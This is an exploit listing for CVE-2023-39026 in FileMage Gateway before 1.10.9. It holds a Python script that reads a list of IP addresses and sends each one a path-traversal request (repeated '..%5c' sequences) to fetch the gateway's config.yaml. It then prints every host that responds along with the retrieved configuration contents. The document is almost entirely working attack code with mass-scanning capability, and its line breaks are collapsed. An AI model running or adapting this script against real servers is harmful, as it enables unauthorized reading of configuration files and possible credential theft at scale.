FileMage Gateway 1.10.9 Local File Inclusion

# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion# Date: 8/22/2023# Exploit Author: Bryce "Raindayzz" Harty   # Vendor Homepage: https://www.filemage.io/# Version: Azure Versions < 1.10.9# Tested on: All Azure deployments < 1.10.9 # CVE : CVE-2023-39026# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html# Patch from vendor - https://www.filemage.io/docs/updates.htmlimport requestsimport warningswarnings.filterwarnings("ignore")def worker(url):    response = requests.get(url, verify=False, timeout=.5)    return responsedef main():    listIP = []    file_path = input("Enter the path to the file containing the IP addresses: ")    with open(file_path, 'r') as file:        ip_list = file.read().splitlines()        searchString = "tls"        for ip in ip_list:            url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"            try:                response = worker(url)                #print(response.text)                if searchString in response.text:                    print("Vulnerable IP: " + ip)                    print(response.text)                    listIP.append(ip)            except requests.exceptions.RequestException as e:                  print(f"Error occurred for {ip}: {str(e)}")    for x in listIP:        print(x)if __name__ == '__main__':    main()